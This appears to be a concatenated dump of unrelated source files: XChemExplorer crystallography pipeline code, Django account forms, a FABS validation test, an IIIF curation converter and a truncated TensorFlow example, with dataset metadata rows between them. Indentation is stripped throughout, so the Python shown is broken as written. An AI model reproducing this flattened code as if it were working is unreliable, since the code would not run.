# check if output files exist
if not os.path.isfile('{0!s}.mtz'.format(self.event)):
self.Logfile.insert('cannot find {0!s}.mtz'.format(self.event))
else:
self.Logfile.insert('conversion successful, {0!s}.mtz exists'.format(self.event))
# update datasource with event_map_mtz information
self.update_database()
def calculate_electron_density_map(self,mtzin):
missing_columns=False
column_dict=XChemUtils.mtztools(mtzin).get_all_columns_as_dict()
if 'FWT' in column_dict['F'] and 'PHWT' in column_dict['PHS']:
labin=' labin F1=FWT PHI=PHWT\n'
elif '2FOFCWT' in column_dict['F'] and 'PH2FOFCWT' in column_dict['PHS']:
labin=' labin F1=2FOFCWT PHI=PH2FOFCWT\n'
else:
missing_columns=True
if not missing_columns:
os.chdir(os.path.join(self.project_directory,self.xtalID))
cmd = (
'fft hklin '+mtzin+' mapout 2fofc.map << EOF\n'
+labin+
'EOF\n'
)
self.Logfile.insert('calculating 2fofc map from '+mtzin)
os.system(cmd)
else:
self.Logfile.insert('cannot calculate 2fofc.map; missing map coefficients')
def prepare_conversion_script(self):
os.chdir(os.path.join(self.project_directory, self.xtalID))
# see also:
# http://www.phaser.cimr.cam.ac.uk/index.php/Using_Electron_Density_as_a_Model
if os.getcwd().startswith('/dls'):
phenix_module='module_load_phenix\n'
else:
phenix_module=''
cmd = (
'#!'+os.getenv('SHELL')+'\n'
'\n'
+phenix_module+
'\n'
'pdbset XYZIN %s XYZOUT mask_ligand.pdb << eof\n' %self.ligand_pdb+
' SPACEGROUP {0!s}\n'.format(self.space_group)+
' CELL {0!s}\n'.format((' '.join(self.unit_cell)))+
' END\n'
'eof\n'
'\n'
'ncsmask XYZIN mask_ligand.pdb MSKOUT mask_ligand.msk << eof\n'
' GRID %s\n' %(' '.join(self.gridElectronDensityMap))+
' RADIUS 10\n'
' PEAK 1\n'
'eof\n'
'\n'
'mapmask MAPIN %s MAPOUT onecell_event_map.map << eof\n' %self.event_map+
' XYZLIM CELL\n'
'eof\n'
'\n'
'maprot MAPIN onecell_event_map.map MSKIN mask_ligand.msk WRKOUT masked_event_map.map << eof\n'
' MODE FROM\n'
' SYMMETRY WORK %s\n' %self.space_group_numberElectronDensityMap+
' AVERAGE\n'
' ROTATE EULER 0 0 0\n'
' TRANSLATE 0 0 0\n'
'eof\n'
'\n'
'mapmask MAPIN masked_event_map.map MAPOUT masked_event_map_fullcell.map << eof\n'
' XYZLIM CELL\n'
' PAD 0.0\n'
'eof\n'
'\n'
'sfall HKLOUT %s.mtz MAPIN masked_event_map_fullcell.map << eof\n' %self.event+
' LABOUT FC=FC_event PHIC=PHIC_event\n'
' MODE SFCALC MAPIN\n'
' RESOLUTION %s\n' %self.resolution+
' END\n'
)
self.Logfile.insert('preparing script for conversion of Event map to SF')
f = open('eventMap2sf.sh','w')
f.write(cmd)
f.close()
os.system('chmod +x eventMap2sf.sh')
def run_conversion_script(self):
self.Logfile.insert('running conversion script...')
os.system('./eventMap2sf.sh')
def convert_map_to_p1(self):
self.Logfile.insert('running mapmask -> converting map to p1...')
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'mapmask mapin %s mapout %s_p1.map << eof\n' %(self.event_map,self.event) +
'xyzlim cell\n'
'symmetry p1\n'
'eof\n' )
self.Logfile.insert('mapmask command:\n%s' %cmd)
os.system(cmd)
def run_phenix_map_to_structure_factors(self):
if float(self.resolution) < 1.21: # program complains if resolution is 1.2 or higher
self.resolution='1.21'
self.Logfile.insert('running phenix.map_to_structure_factors {0!s}_p1.map d_min={1!s} output_file_name={2!s}_tmp.mtz'.format(self.event, self.resolution, self.event))
os.system('phenix.map_to_structure_factors {0!s}_p1.map d_min={1!s} output_file_name={2!s}_tmp.mtz'.format(self.event, self.resolution, self.event))
def run_cinvfft(self,mtzin):
# mtzin is usually refine.mtz
self.Logfile.insert('running cinvfft -mapin {0!s} -mtzin {1!s} -mtzout {2!s}_tmp.mtz -colout event'.format(self.event_map, mtzin, self.event))
os.system('cinvfft -mapin {0!s} -mtzin {1!s} -mtzout {2!s}_tmp.mtz -colout event'.format(self.event_map, mtzin, self.event))
def remove_and_rename_column_labels(self):
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'cad hklin1 %s_tmp.mtz hklout %s.mtz << eof\n' %(self.event,self.event)+
' labin file_number 1 E1=F-obs E2=PHIF\n'
' labout file_number 1 E1=F_ampl E2=PHIF\n'
'eof\n'
'\n' )
self.Logfile.insert('running CAD: new column labels F_ampl,PHIF')
os.system(cmd)
def remove_and_rename_column_labels_after_cinvfft(self):
cmd = ( '#!'+os.getenv('SHELL')+'\n'
'\n'
'cad hklin1 %s_tmp.mtz hklout %s.mtz << eof\n' %(self.event,self.event)+
' labin file_number 1 E1=event.F_phi.F E2=event.F_phi.phi\n'
' labout file_number 1 E1=F_ampl E2=PHIF\n'
'eof\n'
'\n' )
self.Logfile.insert('running CAD: renaming event.F_phi.F -> F_ampl and event.F_phi.phi -> PHIF')
os.system(cmd)
def update_database(self):
sqlite = ( "update panddaTable set "
" PANDDA_site_event_map_mtz = '%s' " %os.path.join(self.project_directory,self.xtalID,self.event+'.mtz')+
" where PANDDA_site_event_map is '{0!s}' ".format(self.event_map)
)
self.db.execute_statement(sqlite)
self.Logfile.insert('updating data source: '+sqlite)
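update_database() interpolates the map path straight into the SQL string, which breaks if a path ever contains a quote. A hedged sketch of the same update using sqlite3 placeholders (this bypasses the XChemDB.data_source wrapper, so direct database access is an assumption here):

```python
import sqlite3

def update_event_map_mtz(db_file, mtz_path, event_map):
    # parameterised version of the statement built in update_database()
    conn = sqlite3.connect(db_file)
    with conn:  # commits on success, rolls back on error
        conn.execute(
            "update panddaTable set PANDDA_site_event_map_mtz = ? "
            "where PANDDA_site_event_map = ?",
            (mtz_path, event_map),
        )
    conn.close()
```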
def clean_output_directory(self):
os.system('/bin/rm mask_targetcell.pdb')
os.system('/bin/rm mask_targetcell.msk')
os.system('/bin/rm onecell.map')
os.system('/bin/rm masked_targetcell.map')
os.system('/bin/rm masked_fullcell.map')
os.system('/bin/rm eventMap2sf.sh')
os.system('/bin/rm '+self.ligand_pdb)
class run_pandda_inspect_at_home(QtCore.QThread):
def __init__(self,panddaDir,xce_logfile):
QtCore.QThread.__init__(self)
self.panddaDir=panddaDir
self.Logfile=XChemLog.updateLog(xce_logfile)
def run(self):
os.chdir(os.path.join(self.panddaDir,'processed_datasets'))
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob('*')))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
self.Logfile.insert('parsing '+self.panddaDir)
for xtal in sorted(glob.glob('*')):
for files in glob.glob(xtal+'/ligand_files/*'):
if os.path.islink(files):
self.emit(QtCore.SIGNAL('update_status_bar(QString)'), 'replacing symlink for {0!s} with real file'.format(files))
self.Logfile.insert('replacing symlink for {0!s} with real file'.format(files))
os.system('cp --remove-destination {0!s} {1!s}/ligand_files'.format(os.path.realpath(files), xtal))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
XChemToolTips.run_pandda_inspect_at_home(self.panddaDir)
class convert_apo_structures_to_mmcif(QtCore.QThread):
def __init__(self,panddaDir,xce_logfile):
QtCore.QThread.__init__(self)
self.panddaDir=panddaDir
self.Logfile=XChemLog.updateLog(xce_logfile)
def sf_convert_environment(self):
pdb_extract_init = ''
if os.path.isdir('/dls'):
pdb_extract_init = 'source /dls/science/groups/i04-1/software/pdb-extract-prod/setup.sh\n'
pdb_extract_init += '/dls/science/groups/i04-1/software/pdb-extract-prod/bin/sf_convert'
else:
pdb_extract_init = 'source ' + os.path.join(os.getenv('XChemExplorer_DIR'),
'pdb_extract/pdb-extract-prod/setup.sh') + '\n'
pdb_extract_init += os.path.join(os.getenv('XChemExplorer_DIR'),
'pdb_extract/pdb-extract-prod/bin/sf_convert')
return pdb_extract_init
def run(self):
self.Logfile.insert('converting apo structures in pandda directory to mmcif files')
self.Logfile.insert('changing to '+self.panddaDir)
progress_step=1
if len(glob.glob(os.path.join(self.panddaDir,'processed_datasets','*'))) != 0:
progress_step=100/float(len(glob.glob(os.path.join(self.panddaDir,'processed_datasets','*'))))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
pdb_extract_init = self.sf_convert_environment()
self.Logfile.insert('parsing '+self.panddaDir)
for dirs in glob.glob(os.path.join(self.panddaDir,'processed_datasets','*')):
xtal = dirs[dirs.rfind('/')+1:]
self.Logfile.insert('%s: converting %s to mmcif' %(xtal,xtal+'-pandda-input.mtz'))
if os.path.isfile(os.path.join(dirs,xtal+'-pandda-input.mtz')):
if os.path.isfile(os.path.join(dirs,xtal+'_sf.mmcif')):
self.Logfile.insert('%s: %s_sf.mmcif exists; skipping...' %(xtal,xtal))
else:
os.chdir(dirs)
Cmd = (pdb_extract_init +
' -o mmcif'
' -sf %s' % xtal+'-pandda-input.mtz' +
' -out {0!s}_sf.mmcif > {1!s}.sf_mmcif.log'.format(xtal, xtal))
self.Logfile.insert('running command: '+Cmd)
os.system(Cmd)
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
class check_number_of_modelled_ligands(QtCore.QThread):
def __init__(self,project_directory,xce_logfile,db_file):
QtCore.QThread.__init__(self)
self.Logfile=XChemLog.updateLog(xce_logfile)
self.project_directory=project_directory
self.db=XChemDB.data_source(db_file)
self.errorDict={}
def update_errorDict(self,xtal,message):
if xtal not in self.errorDict:
self.errorDict[xtal]=[]
self.errorDict[xtal].append(message)
def insert_new_row_in_panddaTable(self,xtal,ligand,site,dbDict):
resname= site[0]
chain= site[1]
seqnum= site[2]
altLoc= site[3]
x_site= site[5][0]
y_site= site[5][1]
z_site= site[5][2]
resnameSimilarSite= ligand[0]
chainSimilarSite= ligand[1]
seqnumSimilarSite= ligand[2]
siteList=[]
for entry in dbDict[xtal]:
siteList.append(str(entry[0]))
if entry[4] == resnameSimilarSite and entry[5] == chainSimilarSite and entry[6] == seqnumSimilarSite:
eventMap= str(entry[7])
eventMap_mtz= str(entry[8])
initialPDB= str(entry[9])
initialMTZ= str(entry[10])
event_id= str(entry[12])
PanDDApath= str(entry[13])
db_dict={
'PANDDA_site_index': str(int(max(siteList))+1),
'PANDDApath': PanDDApath,
'PANDDA_site_ligand_id': resname+'-'+chain+'-'+seqnum,
'PANDDA_site_ligand_resname': resname,
'PANDDA_site_ligand_chain': chain,
'PANDDA_site_ligand_sequence_number': seqnum,
'PANDDA_site_ligand_altLoc': 'D',
'PANDDA_site_event_index': event_id,
'PANDDA_site_event_map': eventMap,
'PANDDA_site_event_map_mtz': eventMap_mtz,
'PANDDA_site_initial_model': initialPDB,
'PANDDA_site_initial_mtz': initialMTZ,
'PANDDA_site_ligand_placed': 'True',
'PANDDA_site_x': x_site,
'PANDDA_site_y': y_site,
'PANDDA_site_z': z_site }
print(xtal, db_dict)
def run(self):
self.Logfile.insert('reading modelled ligands from panddaTable')
dbDict={}
sqlite = ( "select "
" CrystalName,"
" PANDDA_site_index,"
" PANDDA_site_x,"
" PANDDA_site_y,"
" PANDDA_site_z,"
" PANDDA_site_ligand_resname,"
" PANDDA_site_ligand_chain,"
" PANDDA_site_ligand_sequence_number,"
" PANDDA_site_event_map,"
" PANDDA_site_event_map_mtz,"
" PANDDA_site_initial_model,"
" PANDDA_site_initial_mtz,"
" RefinementOutcome,"
" PANDDA_site_event_index,"
" PANDDApath "
"from panddaTable " )
dbEntries=self.db.execute_statement(sqlite)
for item in dbEntries:
xtal= str(item[0])
site= str(item[1])
x= str(item[2])
y= str(item[3])
z= str(item[4])
resname= str(item[5])
chain= str(item[6])
seqnum= str(item[7])
eventMap= str(item[8])
eventMap_mtz= str(item[9])
initialPDB= str(item[10])
initialMTZ= str(item[11])
outcome= str(item[12])
event= str(item[13])
PanDDApath= str(item[14])
if xtal not in dbDict:
dbDict[xtal]=[]
dbDict[xtal].append([site,x,y,z,resname,chain,seqnum,eventMap,eventMap_mtz,initialPDB,initialMTZ,outcome,event,PanDDApath])
os.chdir(self.project_directory)
progress_step=1
if len(glob.glob('*')) != 0:
progress_step=100/float(len(glob.glob('*')))
else:
progress_step=1
progress=0
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
for xtal in sorted(glob.glob('*')):
if os.path.isfile(os.path.join(xtal,'refine.pdb')):
ligands=XChemUtils.pdbtools(os.path.join(xtal,'refine.pdb')).ligand_details_as_list()
self.Logfile.insert('{0!s}: found file refine.pdb'.format(xtal))
if ligands:
if os.path.isdir(os.path.join(xtal,'xceTmp')):
os.system('/bin/rm -fr {0!s}'.format(os.path.join(xtal,'xceTmp')))
os.mkdir(os.path.join(xtal,'xceTmp'))
else:
self.Logfile.warning('{0!s}: cannot find ligand molecule in refine.pdb; skipping...'.format(xtal))
continue
made_sym_copies=False
ligands_not_in_panddaTable=[]
for n,item in enumerate(ligands):
resnameLIG= item[0]
chainLIG= item[1]
seqnumLIG= item[2]
altLocLIG= item[3]
occupancyLig= item[4]
if altLocLIG.replace(' ','') == '':
self.Logfile.insert(xtal+': found a ligand not modelled with pandda.inspect -> {0!s} {1!s} {2!s}'.format(resnameLIG, chainLIG, seqnumLIG))
residue_xyz = XChemUtils.pdbtools(os.path.join(xtal,'refine.pdb')).get_center_of_gravity_of_residue_ish(item[1],item[2])
ligands[n].append(residue_xyz)
foundLigand=False
if xtal in dbDict:
for entry in dbDict[xtal]:
resnameTable=entry[4]
chainTable=entry[5]
seqnumTable=entry[6]
self.Logfile.insert('panddaTable: {0!s} {1!s} {2!s} {3!s}'.format(xtal, resnameTable, chainTable, seqnumTable))
if resnameLIG == resnameTable and chainLIG == chainTable and seqnumLIG == seqnumTable:
self.Logfile.insert('{0!s}: found ligand in database -> {1!s} {2!s} {3!s}'.format(xtal, resnameTable, chainTable, seqnumTable))
foundLigand=True
if not foundLigand:
self.Logfile.error('{0!s}: did NOT find ligand in database -> {1!s} {2!s} {3!s}'.format(xtal, resnameLIG, chainLIG, seqnumLIG))
ligands_not_in_panddaTable.append([resnameLIG,chainLIG,seqnumLIG,altLocLIG,occupancyLig,residue_xyz])
else:
self.Logfile.warning('ligand in PDB file, but dataset not listed in panddaTable: {0!s} -> {1!s} {2!s} {3!s}'.format(xtal, item[0], item[1], item[2]))
for entry in ligands_not_in_panddaTable:
self.Logfile.error('{0!s}: refine.pdb contains a ligand that is not assigned in the panddaTable: {1!s} {2!s} {3!s} {4!s}'.format(xtal, entry[0], entry[1], entry[2], entry[3]))
for site in ligands_not_in_panddaTable:
for files in glob.glob(os.path.join(self.project_directory,xtal,'xceTmp','ligand_*_*.pdb')):
mol_xyz = XChemUtils.pdbtools(files).get_center_of_gravity_of_molecule_ish()
# now need to check if there is a unassigned entry in panddaTable that is close
for entry in dbDict[xtal]:
distance = XChemUtils.misc().calculate_distance_between_coordinates(mol_xyz[0], mol_xyz[1],mol_xyz[2],entry[1],entry[2], entry[3])
self.Logfile.insert('{0!s}: {1!s} {2!s} {3!s} <---> {4!s} {5!s} {6!s}'.format(xtal, mol_xyz[0], mol_xyz[1], mol_xyz[2], entry[1], entry[2], entry[3]))
self.Logfile.insert('{0!s}: symm equivalent molecule: {1!s}'.format(xtal, files))
self.Logfile.insert('{0!s}: distance: {1!s}'.format(xtal, str(distance)))
progress += progress_step
self.emit(QtCore.SIGNAL('update_progress_bar'), progress)
if self.errorDict != {}:
self.update_errorDict('General','The aforementioned PDB files were automatically changed by XCE!\nPlease check and refine them!!!')
self.emit(QtCore.SIGNAL('show_error_dict'), self.errorDict)
class find_event_map_for_ligand(QtCore.QThread):
def __init__(self,project_directory,xce_logfile,external_software):
QtCore.QThread.__init__(self)
self.Logfile=XChemLog.updateLog(xce_logfile)
self.project_directory=project_directory
self.external_software=external_software
try:
import gemmi
self.Logfile.insert('found gemmi library in ccp4-python')
except ImportError:
self.external_software['gemmi'] = False
self.Logfile.warning('cannot import gemmi; will use phenix.map_to_structure_factors instead')
def run(self):
self.Logfile.insert('======== checking ligand CC in event maps ========')
for dirs in sorted(glob.glob(os.path.join(self.project_directory,'*'))):
xtal = dirs[dirs.rfind('/')+1:]
if os.path.isfile(os.path.join(dirs,'refine.pdb')) and \
os.path.isfile(os.path.join(dirs,'refine.mtz')):
self.Logfile.insert('%s: found refine.pdb' %xtal)
os.chdir(dirs)
try:
# re-import here: the import in __init__ is local to that method,
# so the name gemmi is not visible inside run()
import gemmi
p = gemmi.read_structure('refine.pdb')
except:
self.Logfile.error('gemmi library not available')
self.external_software['gemmi'] = False
reso = XChemUtils.mtztools('refine.mtz').get_dmin()
ligList = XChemUtils.pdbtools('refine.pdb').save_residues_with_resname(dirs,'LIG')
self.Logfile.insert('%s: found %s ligands of type LIG in refine.pdb' %(xtal,str(len(ligList))))
for maps in glob.glob(os.path.join(dirs,'*event*.native.ccp4')):
if self.external_software['gemmi']:
self.convert_map_to_sf_with_gemmi(maps,p)
else:
self.expand_map_to_p1(maps)
self.convert_map_to_sf(maps.replace('.ccp4','.P1.ccp4'),reso)
summary = ''
for lig in sorted(ligList):
if self.external_software['gemmi']:
for mtz in sorted(glob.glob(os.path.join(dirs,'*event*.native.mtz'))):
self.get_lig_cc(mtz,lig)
cc = self.check_lig_cc(mtz.replace('.mtz', '_CC.log'))
summary += '%s: %s LIG CC = %s (%s)\n' %(xtal,lig,cc,mtz[mtz.rfind('/')+1:])
else:
for mtz in sorted(glob.glob(os.path.join(dirs,'*event*.native*P1.mtz'))):
self.get_lig_cc(mtz,lig)
cc = self.check_lig_cc(mtz.replace('.mtz', '_CC.log'))
summary += '%s: %s LIG CC = %s (%s)\n' %(xtal,lig,cc,mtz[mtz.rfind('/')+1:])
self.Logfile.insert('\nsummary of CC analysis:\n======================:\n'+summary)
def expand_map_to_p1(self,emap):
self.Logfile.insert('expanding map to P1: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.P1.ccp4')):
self.Logfile.warning('P1 map exists; skipping...')
return
cmd = ( 'mapmask MAPIN %s MAPOUT %s << eof\n' %(emap,emap.replace('.ccp4','.P1.ccp4'))+
' XYZLIM CELL\n'
' PAD 0.0\n'
' SYMMETRY 1\n'
'eof\n' )
os.system(cmd)
def convert_map_to_sf(self,emap,reso):
self.Logfile.insert('converting ccp4 map to mtz with phenix.map_to_structure_factors: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.mtz')):
self.Logfile.warning('mtz file of event map exists; skipping...')
return
cmd = ( 'module load phenix\n'
'phenix.map_to_structure_factors %s d_min=%s\n' %(emap,reso)+
'/bin/mv map_to_structure_factors.mtz %s' %emap.replace('.ccp4', '.mtz') )
os.system(cmd)
def get_lig_cc(self,mtz,lig):
self.Logfile.insert('calculating CC for %s in %s' %(lig,mtz))
if os.path.isfile(mtz.replace('.mtz', '_CC.log')):
self.Logfile.warning('logfile of CC analysis exists; skipping...')
return
cmd = ( 'module load phenix\n'
'phenix.get_cc_mtz_pdb %s %s > %s' % (mtz, lig, mtz.replace('.mtz', '_CC.log')) )
os.system(cmd)
def check_lig_cc(self,log):
cc = 'n/a'
if os.path.isfile(log):
for line in open(log):
if line.startswith('local'):
cc = line.split()[len(line.split()) - 1]
else:
self.Logfile.error('logfile does not exist: %s' %log)
return cc
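check_lig_cc() scans the phenix.get_cc_mtz_pdb log for lines starting with 'local' and keeps the last whitespace-separated token. A standalone sketch of that parsing step, operating on text instead of a file (the log line format is assumed from the code above):

```python
def parse_local_cc(log_text):
    # same rule as check_lig_cc(): last token of the final 'local...' line,
    # 'n/a' when no such line occurs
    cc = 'n/a'
    for line in log_text.splitlines():
        if line.startswith('local'):
            cc = line.split()[-1]
    return cc

print(parse_local_cc('overall CC: 0.91\nlocal map-model CC: 0.83\n'))  # 0.83
```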
def convert_map_to_sf_with_gemmi(self,emap,p):
self.Logfile.insert('converting ccp4 map to mtz with gemmi map2sf: %s' %emap)
if os.path.isfile(emap.replace('.ccp4','.mtz')):
self.Logfile.warning('mtz file of event map exists; skipping...')
return
cmd = 'gemmi map2sf %s %s FWT PHWT --dmin=%s' %(emap,emap.replace('.ccp4','.mtz'),p.resolution)
self.Logfile.insert('converting map with command:\n' + cmd)
os.system(cmd)
# --- File: OmegaErp/Apps/base/forms/__init__.py (repo: OMAR-EHAB777/FerpMenu, license: BSD-3-Clause) ---
"""
Global app forms
"""
# Standard Library
import re
# Django Library
from django import forms
from django.contrib.auth.forms import UserChangeForm, UserCreationForm
from django.utils.translation import ugettext_lazy as _
# Thirdparty Library
from dal import autocomplete
# Localfolder Library
from ..models import PyCompany, PyCountry, PyUser
from .partner import PartnerForm
class PerfilForm(forms.ModelForm):
"""Class to update the user profile on the system
"""
class Meta:
model = PyUser
fields = (
'first_name',
'last_name',
'celular',
)
labels = {
'first_name': _('Name'),
'last_name': _('Last Name'),
'celular': _('Mobile Phone'),
}
widgets = {
'first_name': forms.TextInput(attrs={'class': 'form-control'}),
'last_name': forms.TextInput(attrs={'class': 'form-control'}),
'celular': forms.TextInput(attrs={'class': 'form-control'}),
}
class PersonaChangeForm(UserChangeForm):
"""for something will be
"""
class Meta(UserChangeForm.Meta):
model = PyUser
fields = (
'email',
'is_superuser',
'is_staff',
'is_active',
'last_login',
'date_joined',
'first_name',
'last_name',
)
# ========================================================================== #
class PasswordRecoveryForm(forms.ModelForm):
"""To send the account recovery correction
"""
class Meta():
model = PyUser
fields = (
'email',
)
widgets = {
'email': forms.EmailInput(
attrs={'class': 'form-control', 'placeholder': _('Email')}
),
}
# ========================================================================== #
class PasswordSetForm(forms.Form):
"""To send the account recovery correction
"""
password1 = forms.CharField(
widget=forms.PasswordInput(
attrs={'class': 'form-control', 'placeholder': _('Password')}
)
)
password2 = forms.CharField(
widget=forms.PasswordInput(
attrs={'class': 'form-control', 'placeholder': _('Retype password')}
)
)
def clean(self):
super().clean()
password1 = self.cleaned_data.get('password1')
password2 = self.cleaned_data.get('password2')
if password1 != password2:
raise forms.ValidationError(
_('The two password fields didn\'t match.')
)
class PersonaCreationForm(UserCreationForm):
"""This form class renders the record sheet of
users
"""
class Meta(UserCreationForm.Meta):
model = PyUser
fields = (
'email',
)
widgets = {
'email': forms.EmailInput(
attrs={'class': 'form-control', 'placeholder': _('Email')}
),
}
class AvatarForm(forms.ModelForm):
"""Class to update the user profile on the system
"""
class Meta:
model = PyUser
fields = (
'avatar',
)
class InitForm(forms.ModelForm):
"""From of OMegaERP initializacion
"""
email = forms.EmailField(
widget=forms.EmailInput(
attrs={
'placeholder': _('Admin email')
}
)
)
password = forms.CharField(
max_length=100,
widget=forms.PasswordInput(
attrs={
'placeholder': _('Admin Password')
}
)
)
class Meta:
model = PyCompany
fields = [
'name',
'country',
'email',
'password'
]
labels = {
'name': _('Company Name'),
'country': _('Country'),
'email': _('Admin user email'),
'password': _('Password'),
}
widgets = {
'name': forms.TextInput(
attrs={
'class': 'form-control',
'data-placeholder': _('Company Name'),
'style': 'width: 100%',
},
),
'country': autocomplete.ModelSelect2(
url='PyCountry:autocomplete',
attrs={
'class': 'form-control',
'data-placeholder': _('Select a country...'),
'style': 'width: 100%',
},
),
'email': forms.EmailInput(
attrs={
'class': 'form-control',
'data-placeholder': _('Admin user email'),
'style': 'width: 100%',
},
),
}
class ActivateForm(forms.Form):
"""To activate or deactivate an object in OmegaERP
"""
object_name = forms.CharField(max_length=100, widget=forms.HiddenInput)
object_pk = forms.IntegerField(widget=forms.HiddenInput)
# --- File: tests/unit/dataactvalidator/test_fabs38_detached_award_financial_assistance_2.py (repo: COEJKnight/one, license: CC0-1.0) ---
] | null | null | null | from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns
_FILE = 'fabs38_detached_award_financial_assistance_2'
def test_column_headers(database):
expected_subset = {"row_number", "awarding_office_code"}
actual = set(query_columns(_FILE, database))
assert expected_subset == actual
def test_success(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAA')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='111111')
det_award_3 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAA111')
det_award_4 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='')
det_award_5 = DetachedAwardFinancialAssistanceFactory(awarding_office_code=None)
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4, det_award_5])
assert errors == 0
def test_failure(database):
""" AwardingOfficeCode must be six characters long. """
det_award_1 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAA1')
det_award_2 = DetachedAwardFinancialAssistanceFactory(awarding_office_code='AAAAAAA')
errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2])
assert errors == 2
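The fixtures above exercise rule FABS38.2: AwardingOfficeCode passes when blank or exactly six characters long. A plain-Python restatement of that rule (the validator itself lives in SQL, so this helper is only an illustration):

```python
def awarding_office_code_valid(code):
    # blank/None codes are ignored by the rule; anything else must be 6 chars
    if code is None or code == '':
        return True
    return len(code) == 6

print([awarding_office_code_valid(c) for c in ('AAAAAA', '111111', '', None, 'AAAA1', 'AAAAAAA')])
# [True, True, True, True, False, False]
```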
# --- File: src/conv/convertManifest2Curation.py (repo: nakamura196/i3, license: Apache-2.0) ---
] | null | null | null | import urllib.request
from bs4 import BeautifulSoup
import csv
import requests
import os
import json
import time
import glob
files = glob.glob("/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/json/*.json")
for i in range(len(files)):
file = files[i]
file_id = file.split("/")[-1].replace(".json", "")
opath = "/Users/nakamura/git/d_iiif/iiif/src/collections/nijl/data/curation/"+file_id+".json"
if not os.path.exists(opath):
fw = open(opath, 'w')
curation_data = {}
curation_uri = "curation:"+file_id+".json"
with open(file) as f:
try:
df = json.load(f)
except ValueError:  # skip files that are not valid JSON
continue
anno_count = 1
if "sequences" in df:
print(file)
members = []
canvases = df["sequences"][0]["canvases"]
for j in range(len(canvases)):
canvas = canvases[j]
if "otherContent" in canvas:
id = canvas["otherContent"][0]["@id"]
headers = {"content-type": "application/json"}
# time.sleep(0.5)
r = requests.get(id, headers=headers)
data = r.json()
print(id)
resources = data["resources"]
for resource in resources:
member_id = resource["on"]
res = resource["resource"]
chars = res["chars"]
member = {
"@id": member_id,
"@type": "sc:Canvas",
"label": "[Annotation " + str(anno_count) + "]",
"description": chars,
"metadata": [
{
"label": res["@type"],
"value": chars
}
]
}
anno_count += 1
members.append(member)
if len(members) > 0:
label = ""
if "label" in df:
label = df["label"]
curation_data = {
"@context": [
"http://iiif.io/api/presentation/2/context.json",
"http://codh.rois.ac.jp/iiif/curation/1/context.json"
],
"@type": "cr:Curation",
"@id": curation_uri,
"label": "Automatic curation by IIIF Converter",
"selections": [
{
"@id": curation_uri + "/range1",
"@type": "sc:Range",
"label": "Automatic curation by IIIF Converter",
"members": members,
"within": {
"@id": df["@id"],
"@type": "sc:Manifest",
"label": label
}
}
]
}
json.dump(curation_data, fw, ensure_ascii=False, indent=4, sort_keys=True, separators=(',', ': '))
fw.close()
| 31.938596 | 106 | 0.355397 | 275 | 3,641 | 4.64 | 0.4 | 0.014107 | 0.025078 | 0.026646 | 0.131661 | 0.131661 | 0.073668 | 0.073668 | 0.073668 | 0.073668 | 0 | 0.007688 | 0.535567 | 3,641 | 113 | 107 | 32.221239 | 0.746895 | 0.00412 | 0 | 0.024691 | 0 | 0.024691 | 0.173289 | 0.037528 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.098765 | 0 | 0.098765 | 0.024691 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
fe93e83fe7e8770b4f2c1e2cf97bec6cd0abb158 | 1,628 | py | Python | examples/multiprocess_example.py | ct-clmsn/distributed-tensorflow-orchestration | c841659881e98209149bd6e3e09774a50e3c748e | [
"Apache-2.0"
] | 5 | 2016-07-27T08:25:17.000Z | 2022-02-07T19:41:45.000Z | examples/multiprocess_example.py | ct-clmsn/distributed-tensorflow-orchestration | c841659881e98209149bd6e3e09774a50e3c748e | [
"Apache-2.0"
] | null | null | null | examples/multiprocess_example.py | ct-clmsn/distributed-tensorflow-orchestration | c841659881e98209149bd6e3e09774a50e3c748e | [
"Apache-2.0"
] | 1 | 2022-02-07T19:41:46.000Z | 2022-02-07T19:41:46.000Z | '''
multiprocess_example.py
performs a simple matrix multiply using 3 compute nodes
'''
import argparse
import uuid
def parseargs():
parser = argparse.ArgumentParser(description='Marathon for TensorFlow.')
parser.add_argument('--n_tasks', default=1, help='number of tasks to run')
parser.add_argument('--cpu', default=100.0, help='CPU share to allocate per task')
parser.add_argument('--mem', default=100.0, help='memory (MB) to allocate per task')
parser.add_argument('--taskname', default=uuid.uuid1(), help='name for the task')
parser.add_argument('--url', help='DNS addr to marathon')
parser.add_argument('--usr', help='marathon username')
parser.add_argument('--usrpwd', help='marathon password')
parser.add_argument('--uri', help='curl-friendly URI to the tensorflow client executable (url?, hdfs?, docker?)')
args = parser.parse_args()
return args
if __name__ == '__main__':
from sys import argv
import tensorflow as tf
from dtforchestrator import *
args = parseargs()
with MultiprocessTensorFlowSession(args.taskname, args.n_tasks) as tfdevices:
with tf.device(tfdevices.getDeviceSpec(1)):
matrix1 = tf.constant([[3.],[3.]])
with tf.device(tfdevices.getDeviceSpec(2)):
matrix2 = tf.constant([[3.,3.]])
with tf.device(tfdevices.getDeviceSpec(0)):
matrix0 = tf.constant([[3.,3.]])
product1 = tf.matmul(matrix0, matrix1)
